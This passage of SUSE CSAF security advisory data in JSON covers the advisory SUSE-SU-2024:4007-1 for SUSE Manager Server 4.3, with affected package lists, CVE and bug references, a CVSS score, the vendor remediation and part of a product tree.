"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:uyuni-config-modules-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-49503",
"url": "https://www.suse.com/security/cve/CVE-2024-49503"
},
{
"category": "external",
"summary": "SUSE Bug 1231922 for CVE-2024-49503",
"url": "https://bugzilla.suse.com/1231922"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 15:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Client Tools for SLE Micro 5:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Proxy Module 4.3:mgr-daemon-4.3.11-150400.3.21.6.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Proxy Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Server Module 4.3:cobbler-3.3.3-150400.5.52.3.noarch",
"SUSE Manager Server Module 4.3:grafana-formula-0.11.0-150400.3.21.4.noarch",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.ppc64le",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.s390x",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.x86_64",
"SUSE Manager Server Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Server Module 4.3:saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch",
"SUSE Manager Server Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-app-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:spacewalk-config-4.3.14-150400.3.18.6.noarch",
"SUSE Manager Server Module 4.3:spacewalk-html-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-config-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-lib-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-utility-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-sls-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-sync-data-4.3.21-150400.3.35.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:uyuni-config-modules-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Manager Client Tools 15:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Client Tools for SLE Micro 5:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Proxy Module 4.3:mgr-daemon-4.3.11-150400.3.21.6.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Proxy Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-check-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-setup-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-broker-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-common-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-management-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-package-manager-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-redirect-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:spacewalk-proxy-salt-4.3.19-150400.3.29.9.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Proxy Module 4.3:uyuni-proxy-systemd-services-4.3.14-150000.1.27.4.noarch",
"SUSE Manager Server Module 4.3:cobbler-3.3.3-150400.5.52.3.noarch",
"SUSE Manager Server Module 4.3:grafana-formula-0.11.0-150400.3.21.4.noarch",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.ppc64le",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.s390x",
"SUSE Manager Server Module 4.3:inter-server-sync-0.3.5-150400.3.36.13.x86_64",
"SUSE Manager Server Module 4.3:python3-spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:python3-spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.ppc64le",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.s390x",
"SUSE Manager Server Module 4.3:python3-uyuni-common-libs-4.3.11-150400.3.21.6.x86_64",
"SUSE Manager Server Module 4.3:saltboot-formula-0.1.1723628891.ffb1da5-150400.3.18.4.noarch",
"SUSE Manager Server Module 4.3:spacecmd-4.3.29-150400.3.42.8.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-app-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-applet-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-common-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-config-files-tool-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-iss-export-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-package-push-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-server-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-sql-postgresql-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-tools-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xml-export-libs-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-backend-xmlrpc-4.3.30-150400.3.47.16.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-base-minimal-config-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-certs-tools-4.3.26-150400.3.36.7.noarch",
"SUSE Manager Server Module 4.3:spacewalk-client-tools-4.3.21-150400.3.33.11.noarch",
"SUSE Manager Server Module 4.3:spacewalk-config-4.3.14-150400.3.18.6.noarch",
"SUSE Manager Server Module 4.3:spacewalk-html-4.3.42-150400.3.52.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-config-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-lib-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-java-postgresql-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-taskomatic-4.3.82-150400.3.96.1.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:spacewalk-utils-extras-4.3.22-150400.3.29.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:susemanager-build-keys-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-build-keys-web-15.4.10-150400.3.29.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-docs_en-pdf-4.3.14-150400.9.66.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-schema-utility-4.3.27-150400.3.45.11.noarch",
"SUSE Manager Server Module 4.3:susemanager-sls-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:susemanager-sync-data-4.3.21-150400.3.35.2.noarch",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.ppc64le",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.s390x",
"SUSE Manager Server Module 4.3:susemanager-tools-4.3.39-150400.3.58.5.x86_64",
"SUSE Manager Server Module 4.3:uyuni-config-modules-4.3.45-150400.3.55.4.noarch",
"SUSE Manager Server Module 4.3:uyuni-reportdb-schema-4.3.11-150400.3.18.12.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-11-18T13:19:53Z",
"details": "low"
}
],
"title": "CVE-2024-49503"
}
]
}
suse-su-2024:4007-1
Vulnerability from csaf_suse
Published
2024-11-18 13:20
Modified
2024-11-18 13:20
Summary
Security update for SUSE Manager Server 4.3
Notes
Title of the patch
Security update for SUSE Manager Server 4.3
Description of the patch
This update fixes the following issues:
release-notes-susemanager:
- Update to SUSE Manager 4.3.14
* Ubuntu 24.04 support as client
* Product migration from RHEL and Clones to SUSE Liberty Linux
* POS image templates now produce compressed images
* Date format for API endpoints has been changed to ISO-8601 format
* Security issues fixed:
CVE-2024-47533, CVE-2024-49502, CVE-2024-49503
* Bugs mentioned:
bsc#1146701, bsc#1211899, bsc#1212985, bsc#1217003, bsc#1217338
bsc#1217978, bsc#1218090, bsc#1219450, bsc#1219645, bsc#1219887
bsc#1221435, bsc#1221505, bsc#1223312, bsc#1223988, bsc#1224108
bsc#1224209, bsc#1225603, bsc#1225619, bsc#1225960, bsc#1226090
bsc#1226439, bsc#1226461, bsc#1226478, bsc#1226687, bsc#1226917
bsc#1227133, bsc#1227334, bsc#1227406, bsc#1227526, bsc#1227543
bsc#1227599, bsc#1227606, bsc#1227746, bsc#1228036, bsc#1228101
bsc#1228130, bsc#1228147, bsc#1228286, bsc#1228326, bsc#1228345
bsc#1228412, bsc#1228545, bsc#1228638, bsc#1228851, bsc#1228945
bsc#1229079, bsc#1229178, bsc#1229260, bsc#1229339, bsc#1231332
bsc#1231852, bsc#1231922, bsc#1231900
Patchnames
SUSE-2024-4007,SUSE-SLE-Product-SUSE-Manager-Proxy-4.3-2024-4007,SUSE-SLE-Product-SUSE-Manager-Server-4.3-2024-4007
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for SUSE Manager Server 4.3",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update fixes the following issues:\n\nrelease-notes-susemanager:\n\n- Update to SUSE Manager 4.3.14\n * Ubuntu 24.04 support as client\n * Product migration from RHEL and Clones to SUSE Liberty Linux\n * POS image templates now produce compressed images\n * Date format for API endpoints has been changed to ISO-8601 format\n * Security issues fixed:\n CVE-2024-47533, CVE-2024-49502, CVE-2024-49503\n * Bugs mentioned:\n bsc#1146701, bsc#1211899, bsc#1212985, bsc#1217003, bsc#1217338\n bsc#1217978, bsc#1218090, bsc#1219450, bsc#1219645, bsc#1219887\n bsc#1221435, bsc#1221505, bsc#1223312, bsc#1223988, bsc#1224108\n bsc#1224209, bsc#1225603, bsc#1225619, bsc#1225960, bsc#1226090\n bsc#1226439, bsc#1226461, bsc#1226478, bsc#1226687, bsc#1226917\n bsc#1227133, bsc#1227334, bsc#1227406, bsc#1227526, bsc#1227543\n bsc#1227599, bsc#1227606, bsc#1227746, bsc#1228036, bsc#1228101\n bsc#1228130, bsc#1228147, bsc#1228286, bsc#1228326, bsc#1228345\n bsc#1228412, bsc#1228545, bsc#1228638, bsc#1228851, bsc#1228945\n bsc#1229079, bsc#1229178, bsc#1229260, bsc#1229339, bsc#1231332\n bsc#1231852, bsc#1231922, bsc#1231900\n\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2024-4007,SUSE-SLE-Product-SUSE-Manager-Proxy-4.3-2024-4007,SUSE-SLE-Product-SUSE-Manager-Server-4.3-2024-4007",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2024_4007-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2024:4007-1",
"url": "https://www.suse.com/support/update/announcement/2024/suse-su-20244007-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2024:4007-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2024-November/019836.html"
},
{
"category": "self",
"summary": "SUSE Bug 1146701",
"url": "https://bugzilla.suse.com/1146701"
},
{
"category": "self",
"summary": "SUSE Bug 1211899",
"url": "https://bugzilla.suse.com/1211899"
},
{
"category": "self",
"summary": "SUSE Bug 1212985",
"url": "https://bugzilla.suse.com/1212985"
},
{
"category": "self",
"summary": "SUSE Bug 1217003",
"url": "https://bugzilla.suse.com/1217003"
},
{
"category": "self",
"summary": "SUSE Bug 1217338",
"url": "https://bugzilla.suse.com/1217338"
},
{
"category": "self",
"summary": "SUSE Bug 1217978",
"url": "https://bugzilla.suse.com/1217978"
},
{
"category": "self",
"summary": "SUSE Bug 1218090",
"url": "https://bugzilla.suse.com/1218090"
},
{
"category": "self",
"summary": "SUSE Bug 1219450",
"url": "https://bugzilla.suse.com/1219450"
},
{
"category": "self",
"summary": "SUSE Bug 1219645",
"url": "https://bugzilla.suse.com/1219645"
},
{
"category": "self",
"summary": "SUSE Bug 1219887",
"url": "https://bugzilla.suse.com/1219887"
},
{
"category": "self",
"summary": "SUSE Bug 1221435",
"url": "https://bugzilla.suse.com/1221435"
},
{
"category": "self",
"summary": "SUSE Bug 1221505",
"url": "https://bugzilla.suse.com/1221505"
},
{
"category": "self",
"summary": "SUSE Bug 1223312",
"url": "https://bugzilla.suse.com/1223312"
},
{
"category": "self",
"summary": "SUSE Bug 1223988",
"url": "https://bugzilla.suse.com/1223988"
},
{
"category": "self",
"summary": "SUSE Bug 1224108",
"url": "https://bugzilla.suse.com/1224108"
},
{
"category": "self",
"summary": "SUSE Bug 1224209",
"url": "https://bugzilla.suse.com/1224209"
},
{
"category": "self",
"summary": "SUSE Bug 1225603",
"url": "https://bugzilla.suse.com/1225603"
},
{
"category": "self",
"summary": "SUSE Bug 1225619",
"url": "https://bugzilla.suse.com/1225619"
},
{
"category": "self",
"summary": "SUSE Bug 1225960",
"url": "https://bugzilla.suse.com/1225960"
},
{
"category": "self",
"summary": "SUSE Bug 1226090",
"url": "https://bugzilla.suse.com/1226090"
},
{
"category": "self",
"summary": "SUSE Bug 1226439",
"url": "https://bugzilla.suse.com/1226439"
},
{
"category": "self",
"summary": "SUSE Bug 1226461",
"url": "https://bugzilla.suse.com/1226461"
},
{
"category": "self",
"summary": "SUSE Bug 1226478",
"url": "https://bugzilla.suse.com/1226478"
},
{
"category": "self",
"summary": "SUSE Bug 1226687",
"url": "https://bugzilla.suse.com/1226687"
},
{
"category": "self",
"summary": "SUSE Bug 1226917",
"url": "https://bugzilla.suse.com/1226917"
},
{
"category": "self",
"summary": "SUSE Bug 1227133",
"url": "https://bugzilla.suse.com/1227133"
},
{
"category": "self",
"summary": "SUSE Bug 1227334",
"url": "https://bugzilla.suse.com/1227334"
},
{
"category": "self",
"summary": "SUSE Bug 1227406",
"url": "https://bugzilla.suse.com/1227406"
},
{
"category": "self",
"summary": "SUSE Bug 1227526",
"url": "https://bugzilla.suse.com/1227526"
},
{
"category": "self",
"summary": "SUSE Bug 1227543",
"url": "https://bugzilla.suse.com/1227543"
},
{
"category": "self",
"summary": "SUSE Bug 1227599",
"url": "https://bugzilla.suse.com/1227599"
},
{
"category": "self",
"summary": "SUSE Bug 1227606",
"url": "https://bugzilla.suse.com/1227606"
},
{
"category": "self",
"summary": "SUSE Bug 1227746",
"url": "https://bugzilla.suse.com/1227746"
},
{
"category": "self",
"summary": "SUSE Bug 1228036",
"url": "https://bugzilla.suse.com/1228036"
},
{
"category": "self",
"summary": "SUSE Bug 1228101",
"url": "https://bugzilla.suse.com/1228101"
},
{
"category": "self",
"summary": "SUSE Bug 1228130",
"url": "https://bugzilla.suse.com/1228130"
},
{
"category": "self",
"summary": "SUSE Bug 1228147",
"url": "https://bugzilla.suse.com/1228147"
},
{
"category": "self",
"summary": "SUSE Bug 1228286",
"url": "https://bugzilla.suse.com/1228286"
},
{
"category": "self",
"summary": "SUSE Bug 1228326",
"url": "https://bugzilla.suse.com/1228326"
},
{
"category": "self",
"summary": "SUSE Bug 1228345",
"url": "https://bugzilla.suse.com/1228345"
},
{
"category": "self",
"summary": "SUSE Bug 1228412",
"url": "https://bugzilla.suse.com/1228412"
},
{
"category": "self",
"summary": "SUSE Bug 1228545",
"url": "https://bugzilla.suse.com/1228545"
},
{
"category": "self",
"summary": "SUSE Bug 1228638",
"url": "https://bugzilla.suse.com/1228638"
},
{
"category": "self",
"summary": "SUSE Bug 1228851",
"url": "https://bugzilla.suse.com/1228851"
},
{
"category": "self",
"summary": "SUSE Bug 1228945",
"url": "https://bugzilla.suse.com/1228945"
},
{
"category": "self",
"summary": "SUSE Bug 1229079",
"url": "https://bugzilla.suse.com/1229079"
},
{
"category": "self",
"summary": "SUSE Bug 1229178",
"url": "https://bugzilla.suse.com/1229178"
},
{
"category": "self",
"summary": "SUSE Bug 1229260",
"url": "https://bugzilla.suse.com/1229260"
},
{
"category": "self",
"summary": "SUSE Bug 1229339",
"url": "https://bugzilla.suse.com/1229339"
},
{
"category": "self",
"summary": "SUSE Bug 1231332",
"url": "https://bugzilla.suse.com/1231332"
},
{
"category": "self",
"summary": "SUSE Bug 1231852",
"url": "https://bugzilla.suse.com/1231852"
},
{
"category": "self",
"summary": "SUSE Bug 1231900",
"url": "https://bugzilla.suse.com/1231900"
},
{
"category": "self",
"summary": "SUSE Bug 1231922",
"url": "https://bugzilla.suse.com/1231922"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-47533 page",
"url": "https://www.suse.com/security/cve/CVE-2024-47533/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-49502 page",
"url": "https://www.suse.com/security/cve/CVE-2024-49502/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-49503 page",
"url": "https://www.suse.com/security/cve/CVE-2024-49503/"
}
],
"title": "Security update for SUSE Manager Server 4.3",
"tracking": {
"current_release_date": "2024-11-18T13:20:15Z",
"generator": {
"date": "2024-11-18T13:20:15Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2024:4007-1",
"initial_release_date": "2024-11-18T13:20:15Z",
"revision_history": [
{
"date": "2024-11-18T13:20:15Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "release-notes-susemanager-4.3.14-150400.3.122.1.noarch",
"product": {
"name": "release-notes-susemanager-4.3.14-150400.3.122.1.noarch",
"product_id": "release-notes-susemanager-4.3.14-150400.3.122.1.noarch"
}
},
{
"category": "product_version",
"name": "release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch",
"product": {
"name": "release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch",
"product_id": "release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Manager Proxy 4.3",
"product": {
"name": "SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-manager-proxy:4.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Manager Server 4.3",
"product": {
"name": "SUSE Manager Server 4.3",
"product_id": "SUSE Manager Server 4.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse-manager-server:4.3"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch as component of SUSE Manager Proxy 4.3",
"product_id": "SUSE Manager Proxy 4.3:release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch"
},
"product_reference": "release-notes-susemanager-proxy-4.3.14-150400.3.90.1.noarch",
"relates_to_product_reference": "SUSE Manager Proxy 4.3"
},
{
"category": "default_component_of",
"full_product_name": {
